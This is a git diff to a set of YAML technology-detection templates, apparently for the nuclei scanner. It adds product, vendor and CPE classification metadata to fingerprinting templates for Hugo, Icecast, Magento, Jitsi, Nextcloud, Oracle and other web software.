+# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/hugo-detect.yaml b/http/technologies/hugo-detect.yaml
index 1f16255e37..aa38c4b59f 100644
--- a/http/technologies/hugo-detect.yaml
+++ b/http/technologies/hugo-detect.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:'Hugo'
+ product: hugo
+ vendor: gohugo
tags: tech,hugo
+ classification:
+ cpe: cpe:2.3:a:gohugo:hugo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/ibm/ibm-http-server.yaml b/http/technologies/ibm/ibm-http-server.yaml
index 1ba9585398..0ac7c08c97 100644
--- a/http/technologies/ibm/ibm-http-server.yaml
+++ b/http/technologies/ibm/ibm-http-server.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"IBM-HTTP-Server"
+ product: http_server
+ vendor: ibm
tags: tech,ibm
+ classification:
+ cpe: cpe:2.3:a:ibm:http_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/ibm/ibm-odm-detect.yaml b/http/technologies/ibm/ibm-odm-detect.yaml
index 66ba36ce29..e3ba3b6deb 100644
--- a/http/technologies/ibm/ibm-odm-detect.yaml
+++ b/http/technologies/ibm/ibm-odm-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: "icon_hash=\"707491698\""
+ product: operational_decision_manager
+ vendor: ibm
tags: ibm,decision-center,tech,detect
+ classification:
+ cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +33,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009fde9a9d99b03b9b2eddba0e3707bab095af7d6ffb09a75f72f876af01223254022100ddba1fd9377de788acdf1e8e88c42137b393c5cd18bc4c8ca0154150a676940f:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/icecast-mediaserver-detect.yaml b/http/technologies/icecast-mediaserver-detect.yaml
index ef56542e66..5fa580d138 100644
--- a/http/technologies/icecast-mediaserver-detect.yaml
+++ b/http/technologies/icecast-mediaserver-detect.yaml
@@ -9,10 +9,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Icecast Streaming Media Server"
+ product: icecast
+ vendor: xiph
tags: tech,icecast,media-server,detect
http:
diff --git a/http/technologies/icecast-server-detect.yaml b/http/technologies/icecast-server-detect.yaml
index e900cee021..6dfb743b07 100644
--- a/http/technologies/icecast-server-detect.yaml
+++ b/http/technologies/icecast-server-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"Icecast Streaming Media Server"
+ product: icecast
+ vendor: xiph
tags: tech,icecast
+ classification:
+ cpe: cpe:2.3:a:xiph:icecast:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/identity-server-v3-detect.yaml b/http/technologies/identity-server-v3-detect.yaml
index 1d54d2dc5f..3a196983fe 100644
--- a/http/technologies/identity-server-v3-detect.yaml
+++ b/http/technologies/identity-server-v3-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"IdentityServer v3"
+ product: identity_server
+ vendor: wso2
tags: tech,identityserver,detect
+ classification:
+ cpe: cpe:2.3:a:wso2:identity_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +39,4 @@ http:
group: 1
regex:
- '(?i)build\s+([a-z0-9.-]+)'
-# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cddb07ee93c5a5ea5aaa38543a5cb261019049ec97197bf96407ca82ee44ffb3022100b37750bf50540faa4c6cfbaf893d811a7fef9d22d81d4bf2f631a8faef8e7660:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml
index f9df84d1e9..b3ab6ec590 100644
--- a/http/technologies/imgproxy-detect.yaml
+++ b/http/technologies/imgproxy-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"imgproxy"
+ product: imgproxy
+ vendor: evilmartians
tags: imgproxy,tech,detect
+ classification:
+ cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,4 +29,4 @@ http:
- 'status_code == 200'
- 'contains(server, "imgproxy")'
condition: and
-# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/influxdb-version-detect.yaml b/http/technologies/influxdb-version-detect.yaml
index f31e5b6a5d..4e13b8f712 100644
--- a/http/technologies/influxdb-version-detect.yaml
+++ b/http/technologies/influxdb-version-detect.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: "X-Influxdb-"
+ product: influxdb
+ vendor: influxdata
tags: tech,influxdb,api
http:
diff --git a/http/technologies/interactsh-server.yaml b/http/technologies/interactsh-server.yaml
index f165fb08dd..4e35480ef1 100644
--- a/http/technologies/interactsh-server.yaml
+++ b/http/technologies/interactsh-server.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"Interactsh Server"
+ product: interactsh
+ vendor: projectdiscovery
tags: tech,interactsh
+ classification:
+ cpe: cpe:2.3:a:projectdiscovery:interactsh:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/ispyconnect-detect.yaml b/http/technologies/ispyconnect-detect.yaml
index 545d461663..af83519262 100644
--- a/http/technologies/ispyconnect-detect.yaml
+++ b/http/technologies/ispyconnect-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"iSpy"
+ product: ispy
+ vendor: ispyconnect
tags: tech,ispy
+ classification:
+ cpe: cpe:2.3:a:ispyconnect:ispy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/jeecg-boot-detect.yaml b/http/technologies/jeecg-boot-detect.yaml
index 36f41942a3..6d6f5bba6b 100644
--- a/http/technologies/jeecg-boot-detect.yaml
+++ b/http/technologies/jeecg-boot-detect.yaml
@@ -9,8 +9,12 @@ info:
metadata:
max-request: 2
fofa-query: title="Jeecg-Boot"
+ product: jeecg_boot
+ vendor: jeecg
tags: jeecg-boot,tech
+ classification:
+ cpe: cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/jellyfin-detect.yaml b/http/technologies/jellyfin-detect.yaml
index 98a4fb19f4..472f23f5f1 100644
--- a/http/technologies/jellyfin-detect.yaml
+++ b/http/technologies/jellyfin-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 5
shodan-query: http.html:"Jellyfin"
+ product: jellyfin
+ vendor: jellyfin
tags: tech,jellyfin
+ classification:
+ cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/jhipster-detect.yaml b/http/technologies/jhipster-detect.yaml
index 4ec5762138..db13819701 100644
--- a/http/technologies/jhipster-detect.yaml
+++ b/http/technologies/jhipster-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 2
shodan-query: http.html:"JHipster"
+ product: jhipster
+ vendor: jhipster
tags: tech,jhipster
+ classification:
+ cpe: cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/jitsi-meet-detect.yaml b/http/technologies/jitsi-meet-detect.yaml
index dd1173c2c7..5517df9adb 100644
--- a/http/technologies/jitsi-meet-detect.yaml
+++ b/http/technologies/jitsi-meet-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Jitsi Meet"
+ product: meet
+ vendor: jitsi
tags: tech,jitsi
+ classification:
+ cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:docker:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/joomla-detect.yaml b/http/technologies/joomla-detect.yaml
index afe3244726..54aaf6f94e 100644
--- a/http/technologies/joomla-detect.yaml
+++ b/http/technologies/joomla-detect.yaml
@@ -15,8 +15,12 @@ info:
verified: true
max-request: 5
google-query: Joomla! Administration Login inurl:"/index.php" || intitle:"Joomla Web Installer"
+ product: joomla\\!
+ vendor: joomla
tags: tech,joomla,cms,oss
+ classification:
+ cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/kodexplorer-detect.yaml b/http/technologies/kodexplorer-detect.yaml
index 2689d85062..d856052790 100644
--- a/http/technologies/kodexplorer-detect.yaml
+++ b/http/technologies/kodexplorer-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: app="Powered-by-KodExplorer"
+ product: kodexplorer
+ vendor: kodcloud
tags: kodexplorer,tech
+ classification:
+ cpe: cpe:2.3:a:kodcloud:kodexplorer:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/landesk/landesk-ma.yaml b/http/technologies/landesk/landesk-ma.yaml
index 18f6f590c7..f290195513 100644
--- a/http/technologies/landesk/landesk-ma.yaml
+++ b/http/technologies/landesk/landesk-ma.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"LANDESK(R)"
+ product: landesk_management_suite
+ vendor: landesk
tags: tech,landesk
+ classification:
+ cpe: cpe:2.3:a:landesk:landesk_management_suite:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/limesurvey-detect.yaml b/http/technologies/limesurvey-detect.yaml
index 3707ea8649..1ca5a1ada7 100644
--- a/http/technologies/limesurvey-detect.yaml
+++ b/http/technologies/limesurvey-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: http.favicon.hash:1781653957
+ product: limesurvey
+ vendor: limesurvey
tags: tech,limesurvey
+ classification:
+ cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/livehelperchat-detect.yaml b/http/technologies/livehelperchat-detect.yaml
index d84e0f6ae5..309d2c64de 100644
--- a/http/technologies/livehelperchat-detect.yaml
+++ b/http/technologies/livehelperchat-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 3
fofa-query: title="Live Helper Chat"
+ product: live_helper_chat
+ vendor: livehelperchat
tags: livehelperchat,tech
+ classification:
+ cpe: cpe:2.3:a:livehelperchat:live_helper_chat:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/magento-detect.yaml b/http/technologies/magento-detect.yaml
index 1c9f220087..16e2a0fa34 100644
--- a/http/technologies/magento-detect.yaml
+++ b/http/technologies/magento-detect.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 2
shodan-query: http.component:"Magento"
+ product: magento
+ vendor: magento
tags: magento,tech
+ classification:
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/magento-eol.yaml b/http/technologies/magento-eol.yaml
index a29adb2f62..197f143a49 100644
--- a/http/technologies/magento-eol.yaml
+++ b/http/technologies/magento-eol.yaml
@@ -11,10 +11,13 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.component:"Magento"
+ product: magento
+ vendor: magento
tags: magento,tech,cms
http:
diff --git a/http/technologies/magento-version-detect.yaml b/http/technologies/magento-version-detect.yaml
index e94258b285..6f143a948f 100644
--- a/http/technologies/magento-version-detect.yaml
+++ b/http/technologies/magento-version-detect.yaml
@@ -12,10 +12,13 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
+ cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
shodan-query: http.component:"Magento"
+ product: magento
+ vendor: magento
tags: tech,magento,cms
http:
diff --git a/http/technologies/magmi-detect.yaml b/http/technologies/magmi-detect.yaml
index 33c5df2af9..82cb864148 100644
--- a/http/technologies/magmi-detect.yaml
+++ b/http/technologies/magmi-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.component:"Magento"
+ product: magmi
+ vendor: magmi_project
tags: magento,magmi,plugin,tech
+ classification:
+ cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/matrix-homeserver-detect.yaml b/http/technologies/matrix-homeserver-detect.yaml
index de3ffd0bb8..06a4821e03 100644
--- a/http/technologies/matrix-homeserver-detect.yaml
+++ b/http/technologies/matrix-homeserver-detect.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Synapse is running"
+ product: synapse
+ vendor: matrix
tags: tech,matrix,synapse
+ classification:
+ cpe: cpe:2.3:a:matrix:synapse:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +38,4 @@ http:
part: body
json:
- '.server | select((.name != null) and (.version != null)) | .name, .version'
-# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203e1ffa3c5daae7131064e90d6ef6c55e18e48adb8062b670833ad61902a3d87a022100f9a08b0c7c808f73b24041638cfcbca7eef9289d26402551967c25c1a3a41e92:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/microsoft-iis-8.yaml b/http/technologies/microsoft-iis-8.yaml
index c436f2e523..ac4bc4124a 100644
--- a/http/technologies/microsoft-iis-8.yaml
+++ b/http/technologies/microsoft-iis-8.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Microsoft Internet Information Services 8"
+ product: iis
+ vendor: microsoft
tags: tech,iis,microsoft
+ classification:
+ cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/microsoft/default-iis7-page.yaml b/http/technologies/microsoft/default-iis7-page.yaml
index c8abed447a..1ee69be51c 100644
--- a/http/technologies/microsoft/default-iis7-page.yaml
+++ b/http/technologies/microsoft/default-iis7-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"IIS7"
+ product: iis
+ vendor: microsoft
tags: tech,iis
+ classification:
+ cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/microsoft/default-microsoft-azure-page.yaml b/http/technologies/microsoft/default-microsoft-azure-page.yaml
index 185663a1f1..4a43422305 100644
--- a/http/technologies/microsoft/default-microsoft-azure-page.yaml
+++ b/http/technologies/microsoft/default-microsoft-azure-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Microsoft Azure App Service - Welcome"
+ product: azure
+ vendor: microsoft
tags: tech,azure,microsoft
+ classification:
+ cpe: cpe:2.3:a:microsoft:azure:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/microsoft/default-windows-server-page.yaml b/http/technologies/microsoft/default-windows-server-page.yaml
index 507a7e23b1..494fc15f59 100644
--- a/http/technologies/microsoft/default-windows-server-page.yaml
+++ b/http/technologies/microsoft/default-windows-server-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"IIS Windows Server"
+ product: windows_server_2003
+ vendor: microsoft
tags: tech,windows,iis
+ classification:
+ cpe: cpe:2.3:o:microsoft:windows_server_2003:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/mikrotik-httpproxy.yaml b/http/technologies/mikrotik-httpproxy.yaml
index 356728cfb1..966a495d6d 100644
--- a/http/technologies/mikrotik-httpproxy.yaml
+++ b/http/technologies/mikrotik-httpproxy.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: 'Server: mikrotik httpproxy'
+ product: rb3011uias-rm
+ vendor: mikrotik
tags: tech,mikrotik
+ classification:
+ cpe: cpe:2.3:h:mikrotik:rb3011uias-rm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/mongoose-server.yaml b/http/technologies/mongoose-server.yaml
index 3c9c800083..a7e83405b7 100644
--- a/http/technologies/mongoose-server.yaml
+++ b/http/technologies/mongoose-server.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: 'Server: Mongoose'
+ product: mongoose
+ vendor: cesanta
tags: tech,mongoose
+ classification:
+ cpe: cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/moveit-transfer-detect.yaml b/http/technologies/moveit-transfer-detect.yaml
index 5fc9427f93..63774913af 100644
--- a/http/technologies/moveit-transfer-detect.yaml
+++ b/http/technologies/moveit-transfer-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 2
shodan-query: html:"human.aspx"
+ product: moveit_transfer
+ vendor: progress
tags: tech,moveit
+ classification:
+ cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/nacos-version.yaml b/http/technologies/nacos-version.yaml
index 245d01ce4c..9c9491cc41 100644
--- a/http/technologies/nacos-version.yaml
+++ b/http/technologies/nacos-version.yaml
@@ -9,10 +9,13 @@ info:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
+ cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: title:"Nacos"
+ product: nacos
+ vendor: alibaba
tags: tech,detect,nacos
http:
@@ -43,4 +46,4 @@ http:
part: body
regex:
- '"version":"(\d+\.\d+\.\d+)"'
-# digest: 4a0a00473045022100abe86389e57046654d736df0d6fc80179ded16ae5ca83c00f4cecefa704d26bb022021f3a4d646cf9437cdf2d8bb13d47a739d0ec49d7ed4dbc9ef9491b152219914:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100abe86389e57046654d736df0d6fc80179ded16ae5ca83c00f4cecefa704d26bb022021f3a4d646cf9437cdf2d8bb13d47a739d0ec49d7ed4dbc9ef9491b152219914:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/nextcloud-detect.yaml b/http/technologies/nextcloud-detect.yaml
index c7ec436575..27b8824455 100644
--- a/http/technologies/nextcloud-detect.yaml
+++ b/http/technologies/nextcloud-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 4
shodan-query: http.title:"Nextcloud"
+ product: nextcloud_server
+ vendor: nextcloud
tags: tech,nextcloud,storage
+ classification:
+ cpe: cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/nextcloud-owncloud-detect.yaml b/http/technologies/nextcloud-owncloud-detect.yaml
index 9b12806a06..0ecd99d44f 100644
--- a/http/technologies/nextcloud-owncloud-detect.yaml
+++ b/http/technologies/nextcloud-owncloud-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"owncloud"
+ product: owncloud
+ vendor: owncloud
tags: tech,owncloud,status
+ classification:
+ cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- type: json
json:
- .version
-# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/nexus-detect.yaml b/http/technologies/nexus-detect.yaml
index 40ae05fc13..194d64704c 100644
--- a/http/technologies/nexus-detect.yaml
+++ b/http/technologies/nexus-detect.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"Nexus Repository Manager"
+ product: nexus_repository_manager
+ vendor: sonatype
tags: tech,nexus
+ classification:
+ cpe: cpe:2.3:a:sonatype:nexus_repository_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/notion-detect.yaml b/http/technologies/notion-detect.yaml
index 95854534fa..ec500901bf 100644
--- a/http/technologies/notion-detect.yaml
+++ b/http/technologies/notion-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Notion – One workspace. Every team."
+ product: notion
+ vendor: notion
tags: notion,tech
+ classification:
+ cpe: cpe:2.3:a:notion:notion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/ntop-detect.yaml b/http/technologies/ntop-detect.yaml
index c37f92dd1e..ae463f5cc7 100644
--- a/http/technologies/ntop-detect.yaml
+++ b/http/technologies/ntop-detect.yaml
@@ -10,10 +10,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.title:"welcome to ntop"
+ product: ntopng
+ vendor: ntop
tags: tech,ntop,panel
http:
diff --git a/http/technologies/open-journal-systems.yaml b/http/technologies/open-journal-systems.yaml
index f81553a15e..c19a053f07 100644
--- a/http/technologies/open-journal-systems.yaml
+++ b/http/technologies/open-journal-systems.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"Open Journal Systems"
+ product: open_journal_systems
+ vendor: openjournalsystems
tags: tech,ojs
+ classification:
+ cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/openhap-detect.yaml b/http/technologies/openhap-detect.yaml
index a7fe79673c..32556c069f 100644
--- a/http/technologies/openhap-detect.yaml
+++ b/http/technologies/openhap-detect.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"openHAB"
+ product: openhab_web_interface
+ vendor: openhab
tags: tech,iot,openhab
+ classification:
+ cpe: cpe:2.3:a:openhab:openhab_web_interface:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/openproject-detect.yaml b/http/technologies/openproject-detect.yaml
index e96f5f5652..5a614b0489 100644
--- a/http/technologies/openproject-detect.yaml
+++ b/http/technologies/openproject-detect.yaml
@@ -11,8 +11,12 @@ info:
verified: "true"
max-request: 3
shodan-query: title:"openproject"
+ product: openproject
+ vendor: openproject
tags: tech,openproject,api,detect
+ classification:
+ cpe: cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/openssl-detect.yaml b/http/technologies/openssl-detect.yaml
index bbfacdf4b5..fdffc08926 100644
--- a/http/technologies/openssl-detect.yaml
+++ b/http/technologies/openssl-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: OpenSSL
+ product: openssl
+ vendor: openssl
tags: tech,openssl
+ classification:
+ cpe: cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/oracle/oracle-dbcs.yaml b/http/technologies/oracle/oracle-dbcs.yaml
index a6a7b300d2..8c33bf8030 100644
--- a/http/technologies/oracle/oracle-dbcs.yaml
+++ b/http/technologies/oracle/oracle-dbcs.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Oracle Database as a Service"
+ product: database_server
+ vendor: oracle
tags: oracle,tech
+ classification:
+ cpe: cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/oracle/oracle-iplanet-web-server.yaml b/http/technologies/oracle/oracle-iplanet-web-server.yaml
index f7bb146ace..adafe3237f 100644
--- a/http/technologies/oracle/oracle-iplanet-web-server.yaml
+++ b/http/technologies/oracle/oracle-iplanet-web-server.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: app="Oracle-iPlanet-Web-Server
+ product: iplanet_web_server
+ vendor: oracle
tags: tech,oracle
+ classification:
+ cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/oracle/oracle-webcenter-sites.yaml b/http/technologies/oracle/oracle-webcenter-sites.yaml
index 14cde31794..79e9fd9ae3 100644
--- a/http/technologies/oracle/oracle-webcenter-sites.yaml
+++ b/http/technologies/oracle/oracle-webcenter-sites.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"WebCenter"
+ product: webcenter_sites
+ vendor: oracle
tags: tech,oracle,webcenter
+ classification:
+ cpe: cpe:2.3:a:oracle:webcenter_sites:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/osquery-fleet-detect.yaml b/http/technologies/osquery-fleet-detect.yaml
index aa29b766d4..6d1da8ad3a 100644
--- a/http/technologies/osquery-fleet-detect.yaml
+++ b/http/technologies/osquery-fleet-detect.yaml
@@ -11,9 +11,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:kolide:fleet:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.favicon.hash:-1529860313
+ product: fleet
+ vendor: kolide
tags: panel,fleet,osquery,tech
http:
diff --git a/http/technologies/payara-micro-server-detect.yaml b/http/technologies/payara-micro-server-detect.yaml
index bd5b9573b0..c312a32254 100644
--- a/http/technologies/payara-micro-server-detect.yaml
+++ b/http/technologies/payara-micro-server-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: 'title:"Payara Micro #badassfish - Error report"'
+ product: payara
+ vendor: payara
tags: tech,payara
+ classification:
+ cpe: cpe:2.3:a:payara:payara:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/pbootcms-detect.yaml b/http/technologies/pbootcms-detect.yaml
index 52ee2f12b7..4cf2c45812 100644
--- a/http/technologies/pbootcms-detect.yaml
+++ b/http/technologies/pbootcms-detect.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"PbootCMS"
+ product: pbootcms
+ vendor: pbootcms
tags: tech,pbootcms
+ classification:
+ cpe: cpe:2.3:a:pbootcms:pbootcms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/pexip-detect.yaml b/http/technologies/pexip-detect.yaml
index 7ad0aaf7eb..bd98695b84 100644
--- a/http/technologies/pexip-detect.yaml
+++ b/http/technologies/pexip-detect.yaml
@@ -1,5 +1,5 @@
-id: pexip-detect
-
+id: pexip-detect
+
info:
name: Pexip - Detect
author: righettod
@@ -12,19 +12,23 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"Pexip Connect for Web"
+ product: pexip_infinity
+ vendor: pexip
tags: tech,pexip,detect
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- host-redirects: true
- max-redirects: 2
- matchers:
- - type: dsl
- dsl:
- - 'status_code == 200'
- - 'contains(body, "Pexip Connect for Web")'
+ classification:
+ cpe: cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:*
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
